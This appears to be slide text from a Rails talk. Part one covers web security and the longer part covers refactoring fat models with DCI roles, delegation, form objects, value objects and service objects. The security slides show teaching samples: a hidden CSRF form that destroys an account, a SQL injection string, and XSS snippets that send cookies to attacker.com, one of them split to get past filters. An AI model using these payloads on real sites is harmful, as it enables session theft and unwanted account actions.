Cookies
- max size of 4KB
Session id in Rails
- current_time
- random 0 or 1
- process of number of Ruby interpreter
- string from config file
Cross-site request forgery
World Wide Web Consortium (W3C) recommendations
- use GET to get data
- use POST, PUT, DELETE to modify data
<a href="http://www.harmless.com/" onclick="
var f = document.createElement('form');
f.style.display = 'none';
this.parentNode.appendChild(f);
f.method = 'POST';
f.action = 'http://www.example.com/account/destroy';
f.submit();
return false;">To the harmless survey</a>Security token
<input name="authenticity_token" type="hidden" value="fdgfe342f3ddblablablfr43de">Security token
- current session
- secret string
protect_from_forgery secret: "123456789012345678901234567890..."SQL injection
Project.where("name = '#{params[:name]}'")
# OR 1 --
SELECT * FROM projects WHERE name = '' OR 1 --'SQL injection
Project.where("name = ?", params[:name])XSS
<script>
document.write('<img src="http://www.attacker.com/' + document.cookie + '">');
</script>XSS
<IMG SRC = <script>
document.w
rite('<img
 src=”http
://www.str
ona-atakuj
acego.com'
 + documen
t.cookie +
 '”>');</s
cript>>Rails 2
<%= h post.comments.first %>Rails 3
<%= post.comments.first %>html_safe
CSS Injection
<div style="background:url('javascript:alert(1)')">Fat model skinny controller
client.rb
- ~ 1084 lines
- ~ 2370 lines (with modules)
Methods
- update_latest_epp
- epp_update_needed?
- add_to_caseload
- remove_from_caseload
Methods
- appointment_options
- has_an_appointment_for
- last_contact
- next_contact
Methods
- contact_overdue?
- contact_due
- latest_contact
DCI
Who?
- 2009
- Trygve Reenskaug
Why?
- Separate behaviour from data model
- Make behaviour first-class citizen
- Cleanly separate code for rapidly changing system behavior
Data
- Pure information what system is
- Objects which contain metchods to change their state
- No interacion between other objects
Context
- Inject roles
Interaction
- Interaction is "what the system does."
- The interaction is implemented as Roles which are played by objects at run time
Example
class EppsController
def create
@client.as(Roles::EPP)
@client.update_latest_epp if @client.epp_updated_needed
end
end
class ClientsController
def show
@client.update_latest_epp # raise error method not found
end
endHow?!
class Client
attr_accessor :epp
endExtend
module Roles
module EPP
def update_latest_epp
self.epp = "Latest EPP"
end
end
end
class Object
def as(role)
self.extend(role)
end
end
@client = Client.new
@client.as(Roles::EPP).update_latest_epp
puts @client.epp # Latest EPPDownsides
- No unextend
- Can be slow in some rubies background
module Roles
class EPP < Struct.new(:object)
def update_latest_epp
object.epp = "Latest EPP"
end
end
end
class Object
def as(role)
role.new(self)
end
end
@client = Client.new
@client.as(Roles::EPP).update_latest_epp
puts @client.epp # Latest EPPDownsides
- Role is a class instead of module background
Delegation
SimpleDelegator
- A concrete implementation of Delegator, this class provides the means to delegate all supported method calls to the object passed into the constructor
require "delegate"
module Roles
class EPP < SimpleDelegator
def update_latest_epp
self.epp = "Latest EPP"
end
end
end
class Object
def as(role)
role.new(self)
end
end
@client = Client.new
@client.as(Roles::EPP).update_latest_epp
puts @client.epp # Latest EPPDownsides
- Use method_missing
- Role is a class instead of module background
Delegate class
require "delegate"
module Roles
class EPP < DelegateClass(Client)
def update_latest_epp
self.epp = "Latest EPP"
end
end
end
class Object
def as(role)
role.new(self)
end
end
@client = Client.new
@client.as(Roles::EPP).update_latest_epp
puts @client.epp # Latest EPPBooks
Problem?
How to lose weight?
Don’t Extract Mixins from Fat Models
Validations
Reform
class SongForm < Reform::Form
property :title
property :length
validates :title, presence: true
validates :length, numericality: true
endclass SongsController
def new
@form = SongForm.new(Song.new)
end
def edit
@form = SongForm.new(Song.find(1))
end
end= form_for @form do |f|
= f.input :name
= f.input :titleclass SongsController
def create
@form = SongForm.new(Song.new)
#=> params: {song: {title: "Rio", length: "366"}}
if @form.validate(params[:song])
@form.save
end
end
endYou should access your data using forms even not user facing actions should use forms.
class Employer << ActiveRecord::Base
validate_presence_of :abn, if: !@importer
end2014
class Employer << ActiveRecord::Base
validate_presence_of :abn, if: (!@importer && !@importerB)
endExtract Value Objects
Value Objects are simple objects whose equality is dependent on their value rather than an identity
- Date
class MoneyValues
def initialize(object)
@object = object
end
def self.from_placement(placement)
new(placement)
end
def values
some logic
end
def format_to_currency
end
endclass OutcomeJob < Job
data[:value] = ClaimValues.from_placement(placement).value
endExtract Service Objects
Some actions in a system warrant a Service Object to encapsulate their operation
- The action is complex (e.g. closing the books at the end of an accounting period)
- The action reaches across multiple models (e.g. an e-commerce purchase using Order, CreditCard and Customer objects)
- The action interacts with an external service (e.g. posting to social networks)
class UserAuthenticator
def initialize(user)
@user = user
end
def authenticate(unencrypted_password)
return false unless @user
if BCrypt::Password.new(@user.password_digest) == unencrypted_password
@user
else
false
end
end
endclass SessionsController < ApplicationController
def create
user = User.where(email: params[:email]).first
if UserAuthenticator.new(user).authenticate(params[:password])
self.current_user = user
redirect_to dashboard_path
else
flash[:alert] = "Login failed."
render "new"
end
end
end